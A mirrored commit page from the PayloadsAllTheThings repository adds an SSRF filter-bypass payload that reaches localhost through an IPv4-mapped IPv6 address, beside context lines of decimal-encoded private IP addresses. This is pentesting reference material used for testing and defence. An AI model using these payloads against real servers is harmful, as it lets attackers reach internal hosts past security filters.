mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 15:22:51 +00:00
Merge pull request #62 from PwnFunction/patch-1
Bypass using IPv6/IPv4 Address Embedding
This commit is contained in:
commit
ee00dc1803
1 changed files with 6 additions and 0 deletions
|
@ -123,6 +123,12 @@ http://3232235521/ = http://192.168.0.1
|
||||||
http://3232235777/ = http://192.168.1.1
|
http://3232235777/ = http://192.168.1.1
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using [IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
http://[0:0:0:0:0:ffff:127.0.0.1]
|
||||||
|
```
|
||||||
|
|
||||||
Bypass using malformed urls
|
Bypass using malformed urls
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
Loading…
Reference in a new issue